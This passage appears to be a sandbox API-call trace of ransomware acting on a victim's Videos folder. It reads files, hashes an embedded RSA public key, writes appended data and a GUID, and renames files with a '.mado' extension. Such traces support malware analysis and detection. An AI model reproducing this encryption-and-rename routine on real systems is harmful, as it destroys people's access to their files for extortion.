Flags=0x0, Size=0x8d0) returned 0x3b7b950 [0206.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6360 | out: hHeap=0x2c0000) returned 1 [0206.524] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\MHAzaa\\kCmLP4DG7a0U.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bidmizvx5wsafsepg\\pelyz7rbzidz1\\mhazaa\\kcmlp4dg7a0u.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\MHAzaa\\kCmLP4DG7a0U.avi.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bidmizvx5wsafsepg\\pelyz7rbzidz1\\mhazaa\\kcmlp4dg7a0u.avi.mado")) returned 1 [0206.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.524] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0206.525] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e00ffe0, ftCreationTime.dwHighDateTime=0x1d5e147, ftLastAccessTime.dwLowDateTime=0x597b6b80, ftLastAccessTime.dwHighDateTime=0x1d5dfab, ftLastWriteTime.dwLowDateTime=0x597b6b80, ftLastWriteTime.dwHighDateTime=0x1d5dfab, nFileSizeHigh=0x0, nFileSizeLow=0x65af, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_xO-G4bmjo.mp4", cAlternateFileName="_XO-G4~1.MP4")) returned 1 [0206.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xee) returned 0x32b69d8 [0206.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.526] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\MHAzaa\\_xO-G4bmjo.mp4") returned=".mp4" [0206.526] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\MHAzaa\\_xO-G4bmjo.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bidmizvx5wsafsepg\\pelyz7rbzidz1\\mhazaa\\_xo-g4bmjo.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.526] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=26031) returned 1 [0206.526] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.528] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x6589, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.528] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.530] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0206.530] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x65af, lpOverlapped=0x0) returned 1 [0206.531] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0206.531] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.531] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.531] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321a68) returned 1 [0206.532] CryptCreateHash (in: hProv=0x321a68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.532] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.532] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0206.532] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.532] GetLastError () returned 0x0 [0206.532] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.533] CryptReleaseContext (hProv=0x321a68, dwFlags=0x0) returned 1 [0206.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.533] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.533] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.533] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x65b0) returned 0x3b87c98 [0206.533] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0206.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0206.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0206.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0206.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b87130 [0206.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c50 [0206.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b87178 [0206.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c68 [0206.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c98 [0206.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ce0 [0206.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79cb0 [0206.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0206.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6eb80 [0206.534] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0206.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c98 | out: hHeap=0x2c0000) returned 1 [0206.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79cb0 | out: hHeap=0x2c0000) returned 1 [0206.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ce0 | out: hHeap=0x2c0000) returned 1 [0206.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0206.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ce0 [0206.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0206.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b79cb0 [0206.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0206.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b79c98 [0206.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0206.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b817c0 [0206.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0206.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0206.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b818d8 [0206.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0206.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0206.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b817c0 | out: hHeap=0x2c0000) returned 1 [0206.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79cb0 | out: hHeap=0x2c0000) returned 1 [0206.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c98 | out: hHeap=0x2c0000) returned 1 [0206.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0206.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ce0 | out: hHeap=0x2c0000) returned 1 [0206.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0206.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.535] GetCurrentThreadId () returned 0x600 [0206.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b67078 [0206.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b7b028 [0206.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0206.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321a68 [0206.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0206.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0206.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b67390 [0206.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.535] GetCurrentThreadId () returned 0x600 [0206.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32c64e8 [0206.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c64e8 | out: hHeap=0x2c0000) returned 1 [0206.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b67180 [0206.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0206.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b67498 [0206.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ce0 [0206.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0206.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0206.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0206.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0206.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0206.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0206.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c98 [0206.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0206.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0206.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0206.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0206.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79cb0 [0206.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0206.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0206.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0206.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c80 [0206.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0206.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79cf8 [0206.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0206.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0206.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79cc8 [0206.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d10 [0206.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0206.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0206.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0206.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c98 | out: hHeap=0x2c0000) returned 1 [0206.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c98 [0206.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0206.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ce0 | out: hHeap=0x2c0000) returned 1 [0206.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b817c0 [0206.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d10 | out: hHeap=0x2c0000) returned 1 [0206.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0206.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0206.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b819f0 [0206.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0206.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b816a8 [0206.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c98 | out: hHeap=0x2c0000) returned 1 [0206.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b7b950 [0206.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b817c0 | out: hHeap=0x2c0000) returned 1 [0206.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b67288 [0206.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321a68 | out: hHeap=0x2c0000) returned 1 [0206.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67180 | out: hHeap=0x2c0000) returned 1 [0206.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67288 | out: hHeap=0x2c0000) returned 1 [0206.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0206.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b816a8 | out: hHeap=0x2c0000) returned 1 [0206.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0206.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b819f0 | out: hHeap=0x2c0000) returned 1 [0206.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0206.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79cc8 | out: hHeap=0x2c0000) returned 1 [0206.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0206.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79cf8 | out: hHeap=0x2c0000) returned 1 [0206.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0206.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79cb0 | out: hHeap=0x2c0000) returned 1 [0206.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c80 | out: hHeap=0x2c0000) returned 1 [0206.539] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x65af, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.539] WriteFile (in: hFile=0x63c, lpBuffer=0x3b67078*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b67078*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.539] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.539] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.539] CloseHandle (hObject=0x63c) returned 1 [0206.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6360 [0206.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3b7b950 [0206.540] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\MHAzaa\\_xO-G4bmjo.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bidmizvx5wsafsepg\\pelyz7rbzidz1\\mhazaa\\_xo-g4bmjo.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\pElYZ7RBZiDz1\\MHAzaa\\_xO-G4bmjo.mp4.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bidmizvx5wsafsepg\\pelyz7rbzidz1\\mhazaa\\_xo-g4bmjo.mp4.mado")) returned 1 [0206.542] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e00ffe0, ftCreationTime.dwHighDateTime=0x1d5e147, ftLastAccessTime.dwLowDateTime=0x597b6b80, ftLastAccessTime.dwHighDateTime=0x1d5dfab, ftLastWriteTime.dwLowDateTime=0x597b6b80, ftLastWriteTime.dwHighDateTime=0x1d5dfab, nFileSizeHigh=0x0, nFileSizeLow=0x65af, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_xO-G4bmjo.mp4", cAlternateFileName="_XO-G4~1.MP4")) returned 0 [0206.542] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0206.542] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | 